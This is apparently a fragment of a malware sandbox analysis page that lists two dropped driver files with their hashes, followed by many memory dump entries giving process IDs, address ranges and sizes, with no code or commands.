29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

Download Submit
C:\Windows\System32\drivers\klupd_6bbb4d94a_klbg.sys

Filesize
199KB

MD5
424b93cb92e15e3f41e3dd01a6a8e9cc

SHA1
2897ab04f69a92218bfac78f085456f98a18bdd3

SHA256
ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

SHA512
15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

Download Submit
C:\Windows\System32\drivers\klupd_6bbb4d94a_mark.sys

Filesize
260KB

MD5
66522d67917b7994ddfb5647f1c3472e

SHA1
f341b9b28ca7ac21740d4a7d20e4477dba451139

SHA256
5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

SHA512
921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

Download Submit
memory/1384-817-0x000001D5FC6A0000-0x000001D5FC6C2000-memory.dmp

Filesize
136KB

Download
memory/1688-1005-0x0000000000460000-0x0000000000AFC000-memory.dmp

Filesize
6.6MB

Download
memory/1688-44-0x0000000000460000-0x0000000000AFC000-memory.dmp

Filesize
6.6MB

Download
memory/1688-16846-0x0000000000460000-0x0000000000AFC000-memory.dmp

Filesize
6.6MB

Download
memory/1688-41-0x0000000000460000-0x0000000000AFC000-memory.dmp

Filesize
6.6MB

Download
memory/1688-45-0x0000000000460000-0x0000000000AFC000-memory.dmp

Filesize
6.6MB

Download
memory/1688-474-0x0000000000460000-0x0000000000AFC000-memory.dmp

Filesize
6.6MB

Download
memory/1688-46-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/2032-17331-0x0000000001830000-0x0000000001848000-memory.dmp

Filesize
96KB

Download
memory/2032-17308-0x0000000001850000-0x0000000001886000-memory.dmp

Filesize
216KB

Download
memory/2032-17307-0x0000000000FB0000-0x0000000001046000-memory.dmp

Filesize
600KB

Download
memory/2032-17324-0x000000001C1C0000-0x000000001C36C000-memory.dmp

Filesize
1.7MB

Download
memory/2032-17323-0x000000001BF80000-0x000000001C00C000-memory.dmp

Filesize
560KB

Download
memory/2032-17329-0x000000001C500000-0x000000001C686000-memory.dmp

Filesize
1.5MB

Download
memory/2032-17330-0x00000000017E0000-0x00000000017F8000-memory.dmp

Filesize
96KB

Download
memory/2312-16810-0x0000000000E50000-0x000000000130A000-memory.dmp

Filesize
4.7MB

Download
memory/2312-16829-0x0000000000E50000-0x000000000130A000-memory.dmp

Filesize
4.7MB

Download
memory/2520-760-0x0000000000400000-0x000000000069A000-memory.dmp

Filesize
2.6MB

Download
memory/2616-787-0x0000028998B70000-0x0000028998BE1000-memory.dmp

Filesize
452KB

Download
memory/2616-781-0x0000028998B70000-0x0000028998BE1000-memory.dmp

Filesize
452KB

Download
memory/2616-774-0x0000028998B70000-0x0000028998BE1000-memory.dmp

Filesize
452KB

Download
memory/2616-786-0x0000028998B70000-0x0000028998BE1000-memory.dmp

Filesize
452KB

Download
memory/2616-771-0x0000000000AB0000-0x0000000000AB2000-memory.dmp

Filesize
8KB

Download
memory/3100-35-0x0000000000F80000-0x000000000128A000-memory.dmp

Filesize
3.0MB

Download
memory/3100-37-0x0000000000F80000-0x000000000128A000-memory.dmp

Filesize
3.0MB

Download
memory/4204-404-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4204-403-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4728-1025-0x0000000000820000-0x00000000009A8000-memory.dmp

Filesize
1.5MB

Download
memory/4728-1027-0x0000000000820000-0x00000000009A8000-memory.dmp

Filesize
1.5MB

Download
memory/4728-1028-0x0000000000820000-0x00000000009A8000-memory.dmp

Filesize
1.5MB

Download
memory/4728-1024-0x0000000140000000-0x000000014043F000-memory.dmp

Filesize
4.2MB

Download
memory/4728-1031-0x0000000000820000-0x00000000009A8000-memory.dmp

Filesize
1.5MB

Download
memory/4728-1026-0x0000000000820000-0x00000000009A8000-memory.dmp

Filesize
1.5MB

Download
memory/4728-1030-0x0000000000820000-0x00000000009A8000-memory.dmp

Filesize
1.5MB

Download
memory/4728-1029-0x0000000000820000-0x00000000009A8000-memory.dmp

Filesize
1.5MB

Download
memory/4920-16-0x0000000000171000-0x000000000019F000-memory.dmp

Filesize
184KB

Download
memory/4920-15-0x00000000778A4000-0x00000000778A6000-memory.dmp

Filesize
8KB

Download
memory/4920-14-0x0000000000170000-0x000000000061E000-memory.dmp

Filesize
4.7MB

Download
memory/4920-17-0x0000000000170000-0x000000000061E000-memory.dmp

Filesize
4.7MB

Download
memory/4920-18-0x0000000000170000-0x000000000061E000-memory.dmp

Filesize
4.7MB

Download
memory/4920-32-0x0000000000170000-0x000000000061E000-memory.dmp

Filesize
4.7MB

Download
memory/6084-30-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/6084-388-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/6084-916-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/6084-43-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/6084-42-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/8008-16866-0x0000000005550000-0x0000000005840000-memory.dmp

Filesize
2.9MB

Download
memory/8008-16867-0x0000000005250000-0x00000000052DC000-memory.dmp

Filesize
560KB

Download
memory/8008-16868-0x0000000002BA0000-0x0000000002BC2000-memory.dmp

Filesize
136KB

Download
memory/8008-16869-0x00000000052E0000-0x000000000548C000-memory.dmp

Filesize
1.7MB

Download
memory/8008-16870-0x0000000005DF0000-0x0000000006394000-memory.dmp

Filesize
5.6MB

Download
memory/8008-16865-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

Filesize
32KB

Download
memory/8320-16889-0x0000000002880000-0x000000000288A000-memory.dmp

Filesize
40KB

Download
memory/8320-16893-0x0000000004EE0000-0x000000000508C000-memory.dmp

Filesize
1.7MB

Download
memory/8320-16887-0x0000000002840000-0x000000000286E000-memory.dmp

Filesize
184KB

Download
memory/8320-16891-0x0000000002920000-0x00000000029AC000-memory.dmp

Filesize
560KB

Download
memory/11916-17979-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/11916-17999-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/13096-17303-0x0000000004420000-0x0000000004461000-memory.dmp

Filesize
260KB

Download
memory/13096-17301-0x00000000043E0000-0x0000000004416000-memory.dmp

Filesize
216KB

Download
memory/13096-17304-0x00000000048B0000-0x0000000004985000-memory.dmp

Filesize
852KB

Download
memory/13096-17300-0x0000000004390000-0x00000000043E0000-memory.dmp

Filesize
320KB

Download
memory/13096-17298-0x0000000001B20000-0x0000000001B38000-memory.dmp

Filesize
96KB

Download
memory/13096-17302-0x00000000046D0000-0x0000000004762000-memory.dmp

Filesize
584KB

Download
memory/13224-16788-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download
memory/13224-16775-0x0000000000250000-0x00000000006FE000-memory.dmp

Filesize
4.7MB

Download